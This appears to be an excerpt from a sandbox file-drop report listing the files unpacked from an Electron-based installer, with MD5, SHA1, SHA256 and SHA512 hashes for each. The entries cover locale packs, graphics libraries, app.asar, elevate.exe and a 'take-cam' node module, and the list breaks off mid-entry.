SHA512 e41f89dfa480e863b1596e5eb320c568f73ae393b57e515828eb82631b88cce05861625ec957a3f688c0ab2277fb18ec510b32b70edc7ce5df4cc658ac4923b9

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\vk_swiftshader_icd.json

MD5 8642dd3a87e2de6e991fae08458e302b
SHA1 9c06735c31cec00600fd763a92f8112d085bd12a
SHA256 32d83ff113fef532a9f97e0d2831f8656628ab1c99e9060f0332b1532839afd9
SHA512 f5d37d1b45b006161e4cefeebba1e33af879a3a51d16ee3ff8c3968c0c36bbafae379bf9124c13310b77774c9cbb4fa53114e83f5b48b5314132736e5bb4496f

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\vk_swiftshader.dll

MD5 e76352100075ab2ebe4909070dbff7d2
SHA1 30ec9383406725f5ae8bdb9bc1deb895a5389e03
SHA256 3c8f8fac71c6529e7d381f9dd1dd55133ae6834c09ecadc4929a98e634f533f9
SHA512 6dd7c8f7c06171f532105b65ada7f73d491098532bb57b64907ccf90f6ec8e2e6cff67b8cfe36211d058e0d95bf37b5a65a56a3ed98ef202a8d5eaee69bbdd3b

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\v8_context_snapshot.bin

MD5 5873f16823d6b2d8bb4f6dfaabb9298a
SHA1 018764bc1cb82f1d8eaf887651666f6d4641132a
SHA256 97f85c1290ac89a7dcaf49536d63a453bd0e164ed3a86e75c9f6debad9e5bb34
SHA512 3c3c833928a479ea75f04ed11913ce5b458f23b7a4515fa171a040e598edd339796b2127428d192986c31725c25f0d767b7767af880b1a832e97726f96cb0019

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\snapshot_blob.bin

MD5 c9ab741bbef53fa0e84952b8891a5f5a
SHA1 e2dcb8d034e07243537c86371de0c52bce62cee1
SHA256 4d82fe1e642fe3ca7ad1a173f806088c0652ecfe9f0f6f6e246066e15a3431d4
SHA512 177b98a3090ecfe4b4598dfcd7e8b3ca49efafba4dbd8d6c6d0def462de47c3fabfde831725622783ddc177de982de6115178d9bd9830d918bb544a5a4c27fc9

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\am.pak

MD5 e18a450ef034b42599341c3d09f280f1
SHA1 2001c8a85904962ac3a96938eccc69ad2c110fdf
SHA256 7c2b9098130f1f9e0cf4507b64c0e96ac6354bd6c3616be20e2067cfccc820da
SHA512 ddd87571218fe9f179a6c2a8a15b182625a71a7c19ed90c0969ca2e0e9bad823b926f8b8a6b390cb6fe9c95f4b6c1f1ec7b5167a8424ab1921943922208f798a

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\ar.pak

MD5 6f3e791b4d35ee7d9515614d128752cf
SHA1 181ec3a84fb3e89336d77f24f562a2cbe07619d8
SHA256 e9df0fa338b763a3926c4ee3a87bedf650fa618b6fcf0560c3f5ffe891d48c60
SHA512 3657e610d13a2c938558ec320c298dd490c9e4895ccd304f738aaa2f050373efd7382ca402365f93d23ed488bae82de2d859da788dc8faa8e621346a278f4441

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\bn.pak

MD5 47c95e191e760dee3ef43345577e2379
SHA1 609634315270a91d4ec631642b18bd0036367aad
SHA256 ceed32e429ed1018d4c49343cf52105cbfd1e877c531a5738fd6e6cd33d27da7
SHA512 46b5f8d58780d19e79136c31a67d075c57ddf7e6a1eb197dea4088cc414a0dc24a68fc8ebcaac03b3940af2461123b586706d5dbf8dbdf6fbea0f7bec466db21

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\ca.pak

MD5 423651c45566cd90ea5edd8631e823b8
SHA1 13bed4173a08bcbfefba034aada3d838eece6d16
SHA256 7a39af99d55a1ea838d8d78c5f0da3e1402f9404d32255e31b676ceed4f0e414
SHA512 e09085023beaa37e9d5f7fdf3c32d0c001672b85e2826f0aba9a662ce958ac93cac17bf63495a604e47cb407b1593049388a4bf1b22b2339ead84a206a10569f

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\bg.pak

MD5 5ba0c7200362c9ed55610cc8b66ef53c
SHA1 d45239c2f1b00885407771a41a7776fc1fe8fa3b
SHA256 2339ff55464b4ff704fc3c5bf281eec52a539c494bd059cf0346d9c05ab7cda7
SHA512 6229dbf08a9322c4ec8de4912aa1832f01800a71b7e3ef5870e7fa2b623be4dd248fec4881c3e031e984616147be84d42ab3dd970ae56dc1bd78913a8682a37a

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\da.pak

MD5 55a8f5883805a65c854d25edb3959209
SHA1 d4b3b6bd2a26cbd021fa931d1f63c9ea64e2c268
SHA256 e190187adcbb5f829d162660968ba598ed17bd11339062ca4d807deec8a27fdb
SHA512 4e1f9e6da32f553cbc8cf162726d7aba9e23e2216d6d05b995cf19fff3aafa05ed08fce29b2f8538d46583366402b8630672e650dfbd46952a611e9db0d8016d

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\cs.pak

MD5 3cfd9dc564cfcc33cc5524711365c376
SHA1 2e5016d2643017f37658262122974429f18625a2
SHA256 8be34e4f8226c1dd4e725711ddd884ef4476560f7863edcf378573dde9db3cee
SHA512 6ee156d2fa3b6f601df28e38968d0eae2812d70b41333348dbecd833d5ee6ff944183f0eecde96be433cf1e98c8ec22d6a6d5af5153145842175ab43c73533ef

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\de.pak

MD5 b73344e5a72fca6f956dbab984c123ba
SHA1 0561073aa40a63a9ce9930dd18b18e12ff139b2b
SHA256 6dda3fa65232ca0bff7314f916942a2aa5d9be73a0b0c7a6d016eb34ea6fff5b
SHA512 e8a12da397369f23c102244b3f18f533ec79afa6978785566056bbfe07b10a21ff4973bf17aa829fff65609363988c033b0e48d4a82c846863377c08d8df009d

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\el.pak

MD5 c85edea737a237f15c29d621471fa992
SHA1 a9236ec1cb85c9806039a5a6c2fef27fb1c40cc5
SHA256 52955512f818af239bd2991753d802051665eb203394c1de490049665f3a4b7d
SHA512 6cfa46b2be6b9b084d14a57d2be2a8f7f70bdc03e4e800f8851724ba294873225dd328704ff0c29fbe98e592f2dae4cc3546fbeb3dbe607c4769b4df415c4f3f

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\es.pak

MD5 27aac1b19425efcebeb8b5c29c62f571
SHA1 5502fa06b0d8c05ed9345ba75cc0926f231a1331
SHA256 3a3cda16d7b1ee6b6f7bf71c699d8b215119cb8cad493168f99655a2e6782248
SHA512 4104e01c0204b056d489ec9d6968be4c2eb3d4b7119bc4bf7cd5b4dc8d470d398a237e5fb343a0ccb48344c89172bdb4ed694311c7ed91eb130e5cf37f62f735

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\es-419.pak

MD5 b261b1efe945365588befdf68879040f
SHA1 616f44a5f73f0449b483f36ccf831db6474a10d2
SHA256 1380b9edc9cee4b505f12e8eefa288d8c746ca995b52ceaba27c7741ae8a5cd4
SHA512 9ea14234b9d4d09364e5727b3886fc14544d52508b3e45fb9fd607ca88d2e432361a02b2f7ba34c3d6ecd94b91f9eccd4d54047a97a1ba4eea580ead00b91cff

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\en-US.pak

MD5 0bb857860d8c9ab6d617cea5a5bd4d00
SHA1 351b744d95846bff2ce5f542fec2e87439aa0f8b
SHA256 5c56df9699fc7e8f09ec81421e50a6264cde055e822f5a8cd9bb1edb3066d816
SHA512 33fb73cffbb6781488cedbca4c92a7e4f66923a799beeb7f5cba58dbc23ba8f5130f63a7dac7114e3c3ef6f1df87884fbeb8858bc7604aec9449fdfd16c25078

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\en-GB.pak

MD5 52e2826fb5814776d47a7fcaf55cb675
SHA1 51fbbc59dcd61116cbc0a24b0304d4c1c58e8d0b
SHA256 83ff81c73228c7cadba984d9b500e4fce01de583ecde8f132137650c8107c454
SHA512 69257f976d01006c5f3d7e256738c97c59115471f8e7447cfa795f7fa4ff12d6fd19708e95ffb2aa494b50c1763fe35d5885b9414112d2934baf68fe668ed7cc

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\fi.pak

MD5 cc592d91ce8eabaa75249cb78b889376
SHA1 f2f0f7f105a17f3e4b1a97ed0e3c2e871c2c3eac
SHA256 b1cb0b32efa78fd8634652c74f298f1d5127f2363ef601cf000417e5c7fefd20
SHA512 58e2eaffe26d8fda8df43e7ebef449cfff1065e940c128efa0276511e34e96e52da9230f294b01d4ecd8ef606b792d372bff897d6d8bb67c31379418ce867d48

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\fa.pak

MD5 b321befe588be9b75c1634b1d8a32e96
SHA1 079596edc6bf483297971f8a26ffa101d9c3f7cb
SHA256 323c4d2f783cc99f740a742339f80f8cc855ed93202f20e3647d1e7fbdfbdf1b
SHA512 24d920f6fb81804255d3fc9663996ae0a7c90bbda65081c1da3353b5a527e86c9f6d5781ef82e836e320abc499ff87bf62ce3a308ff547edc0c1d83fa1bd5d11

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\et.pak

MD5 c76db3385190c6840315c4497e40258a
SHA1 34f1aef2ba2925bebc5dcdb70e5b6c1a138a5c46
SHA256 e8af084ef5e1062c5966dd7802074ac24f3672dc3c9b9c5453a397644727191f
SHA512 90a870369d307758b33d74e6213676d65c2d332f42577c8aff23d96b512f3c2a2bdace8d6d9007f88b9175eadc6f2ae28b498b1265550849ff9317465a37ad29

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\gu.pak

MD5 836c192be5915d51f2acdcabc072d10c
SHA1 d5d67c159636b3689b3f2188d052f89e05299b69
SHA256 d48e8960fc802741eb90ff7fb9ecf23074b027564b8f20e5b2dd30736134b7e3
SHA512 90814a7c9a32c32bd8ce69e36877a45e1fb4ab493eeb686dde736026a142a9120107a0f983556a44e7488befc2226c58b4f1301a2d5bf2357c5d45ba4e08bbfd

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\fr.pak

MD5 c3095ce1e88b0976ba7bef183d047347
SHA1 b14cfbf6e46ac1f189595fc09660178525301138
SHA256 66488dc10517b6e3638686be95b430477a39304e92ac45dfe62b58cae3a77272
SHA512 29f47b1eff4681a9a17a50d6e82d63c22fe7bfe4ceb79862e81d8cd9f96fa38e225978b4c4b1f8e55b220235b91652c776fa8d2e559c68942c6ccf402812a421

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\fil.pak

MD5 40bddaf97f64dfea9ebafc7f82166f80
SHA1 90d1fde3c0b27d2184f0353991259c2a92c7820c
SHA256 39a9d63736e7b4593fc6873ed3c19d45fbf9eb78a012bfdcee0fea5906ebc5b2
SHA512 d1e61c53e09a0dc50edf5aba5cf286a251ee88421aa2cd49332b70a5859646605ecb7d0bb97ea7242d14a18742e23da0a14c04b0b99b57a466ec87f4f66b897e

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\he.pak

MD5 6a02a37e1ca3215fa9ee0e1b0fbcf5e7
SHA1 89a8a126c0bbf536ac58e29fc50e045fb1b88220
SHA256 f5cf34ce58b7f0d450936981aa7ffa060821403e6768eee3746ea4ffc9193986
SHA512 6607eb2329b81f1eaf0ed3a564eddcb30e6ab59229f2fbf6fd3d2140ffaa8853a330eda627a4458ef6bb06f32c5183edda869e34cd4ead1f87f88d5c622c1a16

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\ja.pak

MD5 451379fb7ae1173a494158932e81bbe2
SHA1 3924e94519229c072aa19dd99a42caf21b99658a
SHA256 e7b9d7373f13df7deb758ea744c7181c7da3ad2735c0f093d4fe3d907997051a
SHA512 d0ff3843b8fe15bef01cec2d22edc1c40f2d63b9ea0d4cc8497989eebfa2c78ff3f9036a0b822034144b61b49ebcbdfa59ee8acbc08569f380c743d681c32b5f

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\it.pak

MD5 568eb6984be591a68a08d6909dfa85b1
SHA1 b120be83e53e6e108f7bcb6ba82746f9d5a7c9dd
SHA256 617fdac2a4dc47c3890e651af76209627f40074cf9411ebdf23098bf405911c9
SHA512 7a6476a0eda1898c5d8fa2c1523cf44b42faae34809c9a5f5cdd63e16e10f19934edee9539ffffe0f50136508107f531951a24932b3d43580b32ffba4245c363

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\id.pak

MD5 9647816f6d4539897a1ff2a39906050a
SHA1 fb324af7595bf22af577ed2e9c53c29c699eacb5
SHA256 6d4ee40d5deea691bb34a248747e7800f9064af83b7238aafc33eeff1d3eab88
SHA512 3015ac2fd4ba447178e61b7fa1f3d8e4866095f286b66d29b2617dd0cc06d06760f67080eeac55f3eaee22d5fece577dbb7112be3f171ef3145458f891f8383e

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\hu.pak

MD5 71d42cb22d2d7a8b26c4514ab12df3aa
SHA1 cd0307503a7906f1742d1e98fc816959319c2171
SHA256 b51bcb888dbc27bab88a8c9d081df7496de8a9a5a4cd2cfe08abc154190e75e6
SHA512 29c67391bca706807be3a0cc79fe481f220e30263957a9c2485f0a4c498a5b250bdd83b5f4fad8d0b19c8a9a07d5650b5ebd5816b6aae311a1cde78a89303244

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\hr.pak

MD5 6f92235e6ba003af925a2d6584afd27d
SHA1 3ceba61e9c2975466b6244188f5ea72aaf042fc7
SHA256 479dc4f75a889d45f62b4ddb6eb48f21c473e37875468c9c26d928a263e15840
SHA512 82f2642dff4400704c15c2fa02d0ec74ed3fe888dc835447c1afce7463dee8f480bb81be358c306e681625864a6d25e5cd6c96252b8a56e6fc62014b3aa4d26a

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\hi.pak

MD5 176fbc842b15023ef297f025654d56e3
SHA1 68a435955720b129a985ddb1a30b5e18b8ed01e0
SHA256 cf4ae0402f41531125d431792883d8f61246531938208a538e892ebe1b3f05e5
SHA512 1ad65e7c029ba7ace48eaec0226734c7ca1da9ae6f2c5fe89d5cf33729cb28d03246c4dcf7a618f0588b6c6575b5dfe7b85bf8b2957de22243c19fe07d2b2a62

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\lv.pak

MD5 4eaeded34021ca12b3c6f828bb08b458
SHA1 50eb7d9952e90aa546a261517396fed761003bdf
SHA256 b5e02b8d1164be2c2c23f54940da21e3f813d846b6a40c5a9c105cf3ec019bbd
SHA512 08799f9af7823cfedabba883fa19d8bc7e451b8c28a95d9fb523fef971f5c35e7b2f330181fd30a8c0c85156bc69a7b9d1c69c93a663a5ec5bfef6ea818631aa

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\lt.pak

MD5 2d4fca437a7548893dc4b51fa5b33c33
SHA1 c1493013d7d981ea9223716e415380992de65c2f
SHA256 776dba792df7b444e1b720326312d8b8312cade74a1372c49456d932b7c65769
SHA512 b6a55ee1deff48d717a3e9399aef3c45eeec810cc5b5709fa3e9f56850115a5b02e02b7959ec77a6797e68516ee9372bacd260e62ac0d55a8e4c1c27af782b42

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\ko.pak

MD5 150d733875e4eddbd5e10ffa214a6186
SHA1 d8130c37641fb641c9d83ed1f5db802c5c8dbe97
SHA256 d311e94f79504f59abf32fbd025087eab3a4c6471d7951508988e7f44a8688a2
SHA512 6fa745508eb6f4e1d4e68e20290e76637aa8fc06eee36ad7b134ffb20c0cbe2e9eb0bb93d50c10dde31b838693b6471ab7df05bfaf3afd526cd52e7f6f6459e9

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\kn.pak

MD5 d5c341cdd2b06951c078f3b430fdec7e
SHA1 21f1f5b2a63429a3cfbf7da9d0800362dd3622cb
SHA256 9f6c628e96280c331b6241bc5c8a49df8f881c6c98040667d86e228d638caecd
SHA512 57faee2df65ba7ff445f1b5d6b3efe6a022f49e1b246ccc5e0b5fafd131576c46baf557cae40b0fa9e70682cc3fe2ce5024fd26d353dfb191700527d73de5d10

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\mr.pak

MD5 4a01ad994a012da27145bd1cd9a4f9d3
SHA1 2b12ba56149b55fa544233f9707c0342c8df3c3c
SHA256 0722efdc5740556be00b4eedf6a7745e87e34382c4afb78ee8dcfdf17da8d648
SHA512 eb2e9b47a72c5c844b68252a3f8d834b8028e3a56b20aad8baa4077eb9eebed340d3f921adb6d06f89cea81dfe7aa5ee2ff766141c26ecc0ebbf0e7c062c4a3c

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\ml.pak

MD5 3b0979dd14434f8ba91516bf1344cd4a
SHA1 d9dd038ee2fe4ea5c74e6ce3f70a6959dc7a7763
SHA256 a77c1b50c21e580eede57b8c464fc53cf93ec3ad1b195c3c001defe83b66e0eb
SHA512 572929ae22d7b56704d84c98510c349393c69768050eceffcb4828eda86af4d0cd690843161ab7501604505910a7c78f7628db557c798c15417de9e58e2c6a9c

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\pt-PT.pak

MD5 ecd84b296d3bb312ee18e21017311986
SHA1 f5625523f85c10723750834a54ff59a2dd886fb3
SHA256 fcfaa9c44c445876c286388b6a1abc1df949f3dda3d64fb57d6e0d54a05cdb94
SHA512 e95b74238220024cdd0bd1c0f18beadbbe427d76cd8d6b32d5700adcd34ffb068ad0bf75404921485c8077f395f5111cd40d5dfe2b5b8f34c62e6fc80b507456

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\pt-BR.pak

MD5 b8a5dc05eac4ba10010c98d5f80f33d4
SHA1 986d7a9d4244dce96e1a3442b7d8c55cb12a0ab7
SHA256 b4a2919306ba742e316b12be3c2d4007d9120234b32a9bba4070418bbbfb5d78
SHA512 ce40fd21698c14d3ce9f8301314d85267033a756e969dbb26e2ffff518a7af48ee6687a9dcfd66d4b9332abc61791474b474a5207f0898c6a9b7b6d432842020

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\pl.pak

MD5 6a3d1c8c1367b77e392223b51bfd636c
SHA1 2c5f9b651cd0ff5c19513f08520c96c8dd061644
SHA256 ce0f629797bba6846601bd367a23e6c450af4c444891c87a3520db1e35f86623
SHA512 8f9d2bf68c2205b5f2fa2c3ab6bbd2629cc289ee318b750acbcbed9f65aa89b19b8def3e37698eedcb60d081408bb5e319a657e261385147169cd796708b54f7

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\nl.pak

MD5 3c505c7f12684f55ad1d929135dfcdf8
SHA1 45267d0ad87c847e3e878d2587b61aa4e66686e9
SHA256 f13e98a0857310b92f0a8b87885b2dc4b4da3ef790a4c76771ccf5461d090dd6
SHA512 17da74e58454a41d7480141442884faf31c39cbb477f3d06aaa6da917bba8368eadab3cfaa23b0b7a1dd19fb37162a8c94e8ac74d886d41276812e1fb123040b

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\nb.pak

MD5 b61e42f66d581b6a8929cdf5fb10662e
SHA1 6f06fa9ee092fbcb61bbd668734fb3b92cfb549a
SHA256 1b17dcde8fc7308d926fbe0faa83dfc9ffe2efc5715e9afd557dde839ad98b7e
SHA512 79b82346c3f133a6ba44148a8432ad4e08e2805187b759509cb386bc800fd20215592c07d953812c243f0b1d5e1354245f2cb42b2b3eb6c87280bcb4008dbe97

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\ms.pak

MD5 6cfadaa784e687e6dadbcd80e631bc9b
SHA1 481acb75f525055bf4e45ecabe0eadcb9c492106
SHA256 fb5e125dd5e1f21e8df229d22cb3d1f9078bd79bbddca352899248f2a8b21b71
SHA512 0d7da5a90fe9372bc704ab8cdc8cbfb14d323cafdef856987e2d9e34d980196c03985e25099f5d1bcb10c97f040f4766e2c3713718649bb3f43914a77f0dbb39

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\sv.pak

MD5 41e76f7775fc9a2d6e3c02c46e9b32f6
SHA1 088c15c74a68bee69682bf89c31055332b68c84a
SHA256 2533676479e9469ffcdaabcb47d3e39bebfe7ae2b80f70784e918a8827439e13
SHA512 6cde752d748c4772b533c8894f18134e5842113f8c7590b44a7dfa088aed65b232361fd16170df3b0d738066dbc3a769847adf4dd8ba42de63c9c2b33f9beb6b

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\sr.pak

MD5 ea5caf6562e00ea2ec7cb80758265feb
SHA1 5a345e5dd498c1b7695140eb8e9e9301606efc0e
SHA256 069720f356d0cb8a372f587569114f2ee4f8b2969778a68ab6e68a573239e89e
SHA512 2d99bce8215ad24a34d88dd2b114cc77641c52133cdfcf4362d6b6196f23fac35d65dc322d69c081fe58d3f437ed20a76c58292f3aa3b922da11c7de161a77a3

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\sl.pak

MD5 d748ce0dc1957686ff55704ff78426d8
SHA1 438832caf332a921347d5d51e847312f8bddc0f6
SHA256 6cd3f813904085d067bbf32f9d8aa1f94f7937c4efc6a70541117d12db2c41dc
SHA512 2c7e7ad5f6e8e36a2a74be02e0c0dccf5be895fcc076a429467785ea0caca952e4e18ea1494f1c377495da4a67ce480f7ad853f0a7abac5c643a5e1727b65f4a

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\sk.pak

MD5 2d0935f6046ac89bd3b239b96176652b
SHA1 0e3a8c5f5d88a7b8db3038ac2b518ca3e314194c
SHA256 065f761827c4ce685f4d15e21f77368e7428b8b04113d4be5670cd990fec2350
SHA512 066c17586413cdb996ba405fe399c95f66a2dde1cbc64bb9361e385bced3bfbcbcfe48fc6a002e0f5daa65452dbf121e4fcc0f18133dd392d7c155892f0c5e26

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\ru.pak

MD5 262c0bdaa87065c8e9823fd61ac0c346
SHA1 36882148bfda84155fcb0945567db74860b67265
SHA256 761e42f31b8848aaa926d511debc70744e0017e73930817f4aba246b3501142e
SHA512 8cbfd69a7ceeb03ba2df2ab8f33e62aff39d6cace66c92aaac4dfcf441a91b50e40da6ef436ae29e9b1d8ad0df58f8f09a7b4710d48ff1624b1a559b5c281877

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\ro.pak

MD5 a32df1c5c6cc3cc3d337987a11e4a609
SHA1 f6fb21ae4f09eaad31b3a00dabf50ef7c7eed485
SHA256 58318ece7fa0422592c3568cf5493e63ac65aa1c04b44c691bf656ce1e437f18
SHA512 646932316ea0dfdc2527e9a518f4d5d9241d6af26b395657097d378988cb5e0b94d91723bafc40a86b9bed4c6f41474e94835ccba27dea3f37319c122bb0f6e6

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\te.pak

MD5 ecdb890b33102cf7127a0b66fd36728f
SHA1 480f9fab5b08e66af4701203bfa17ab315e205e3
SHA256 76351a2e72d832f74fa42488c49a65239e166a109cc07f4363c2ccb0512e90f6
SHA512 ef299d1ec7f16893f2db20c8c943f7c0ec25dab99cd96283fe461a52cd77e8625fc764aebb4dae6182fe52d7d5878c71954724c52de041496d2c1a064511c42c

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\ta.pak

MD5 37b4255982d6f301235ed37930a6acb3
SHA1 338acb296f59b6eb4cbd9de71cae43344d28d67b
SHA256 b8b602b177a5ea6bc290c3d95f7863d73c25969f8bc68ba897dd744d1ef366c4
SHA512 e3839a390a6eab27875a84ad396cf0aba09ef20dee1bf063ecbbdf17aee1322f11837018ce4ca48df54b958266272570aaa01219f7eb317f4ae7ef71d8a9108a

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\sw.pak

MD5 2a21dc4a03dedca708fec2cab911f2ca
SHA1 50e654e2f128f1ef46410d79b8d511eb790c7492
SHA256 745d25970fdcc33719c3c2c0f01e25e513454b20cd6d455c825b6b5bbfca9b00
SHA512 fa2f88bc531ba979d5db3ecaf36883b39d6fcf37c48064b36a550da82f2fb774340cca90fbfad98265d1ad415c9cfceacee5004d906c9813b922144c606c89bc

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\th.pak

MD5 2cfc20becbee524cf5675b38304398db
SHA1 f7d52e1bfcf054a41525d65cc1a0ab1ec35b3ab8
SHA256 e5d55b09e513a5baf528dbf396af3299456e67e46d6585142c3848684381b826
SHA512 f1153a85d564776f74ee8502067bc864ed77ca30cf7d4301de023fb4af423eb937f7350513c07a51d28707834d18d406e9d51e5a5fc8ad4f417717e13fc8293f

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\vi.pak

MD5 69c8796439192577f48bd249175aaf37
SHA1 97c52088ca69dada593db0e42b2135d264646454
SHA256 d7fdb53592de803a5fbcd8561c4918f1562f92fc8a3fd0039a2a1a7b76a8ecc2
SHA512 65eb7cb15291474ec7f9354775e59bcf334c90ddf3498ebd184e4c47118308421b2405bfa679e4b3a70ed1790e167c109fc2c72e89c3e31b5378cae975424144

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\uk.pak

MD5 b51ad816fd27395983efd86a58169846
SHA1 e60f7e9bce6b0c7fca9aea86993e0872772ae4b5
SHA256 e30635adbdbbe036979ffb65fcb5380262697003faea1d9ef38d9589aa2888b8
SHA512 d804fe1bcdacad3545f90dab9239b6a1abdf6b1feb50b1edfd71703c1c2c785eb0cadd10eba26874f8ee2ebc5ff55c4d7d154674e5a647a509ddcd986ad25809

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\tr.pak

MD5 40491896ad21543f339467186c5efb40
SHA1 695dde7cc35056dcbf0a533aff8299d4c6b61bd8
SHA256 43e99e132acaba88971b81a43531845dc7fc3a1e0794c3373de7d9a50a5655aa
SHA512 18d5ee9914849462e0b1bafd1ca216b29d0795e282ae0bdb354b15caf5c18f37f44fbd6f626b2cbb095e3398a6496de72e5b0d15621433979b5a589e34fac818

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\zh-TW.pak

MD5 565b28ce0de7d6663ff786cb4bd07c27
SHA1 5bf5b0dd426e79771d726955dd576560f31fff40
SHA256 d75d93fbae2a605e4e7251c17131e675710686096e9751382cde19f3a10a922a
SHA512 f277b0c925b20716c5819e4be9603100cb67f9657d1323d7eabaebf1bc5e5b21e07b43adc0a4dcd89455a9dec102c73e7eaebe2b1e8ef46ee1520aa78e442a2d

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\locales\zh-CN.pak

MD5 971fafdac5ed6017146e6da52943a7da
SHA1 f2b6802a9a03c08eb8528f8caa7244dc53163595
SHA256 693225ba179446b6fe2d1a74971a55c8375296e75fe1643407bb20df751776ba
SHA512 66bd4d2bb9f5219a3bf171cc4180d3babad8e7b44ac1947b2bbf2b870875d7b871b2d5953b3ef3176c06fb3b47c5d29ccb9920bc22c4e49d1e3bcde39fde385c

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\package.json

MD5 067e233b0609d56ff4756bedd8c0efe0
SHA1 96419d05adc4b6674948b4ac14f8ab5bb3ce4380
SHA256 6bee642c1b5de99e4edba87ec3221c2ecd10b65e666b6f2bef64a745538ecf74
SHA512 94900f5ff762930b1b060ba4dd44d629d6c3e2dfc0dacb1a543f1ea5a3cd40e793acaff4abefbff588ceb422d65f8041ec190a2b56f7c303c3314eb16eca4159

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\DirectShowLib-2005.dll

MD5 3df4d06bdc2c5e83fad6f22b343a3595
SHA1 78d81514bcb7be465138424e1de09de9266e21c2
SHA256 2bfd6bd7339df8f06d53df22d5b01c9ba3a96d5fd01bd39559ce845579dbda7f
SHA512 7f385725a4a6d2193105158bf51148783dbe7d852d54cdcc241c5e8e06b027e520c162317216e68c74855af80d9535ab05ac30909c7b9c84bfc69fb7dee59ede

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\resources\elevate.exe

MD5 b14d01e35585f2f512016909e83365b6
SHA1 90eff86894be4471ecd49b95cebf29482f43be47
SHA256 722784266de09f85e6302fe89882688731d456a62e30606ecebcebd065553e19
SHA512 e96c8aefd401ec735424fe1f1a6fec8bbcdbef557343a274d7dd6fbd9fe04e10818989f8694341a81bc66dde2eb19775dcbbecb90361a88d88c53f535718594a

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\resources\app.asar

MD5 5a34f369c85c540f1ff1106507d7dd40
SHA1 73e77100903610e6556efebcb51b76c3ef145b5e
SHA256 bd85e89b0ecff2007cafdc875a1f80b975275afdcc3cbe011b2aa6014f3adc1e
SHA512 7732dfbd198831f1108f2cccfc2bf05d5568bc825866195e24beff91fe9ebcb33394550131a828ebc7b3e597c0980e825bea17e6f1ad75a53b8502e2620dfb1d

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\swiftshader\libEGL.dll

MD5 b458fa3379ccd48937657ea3517be864
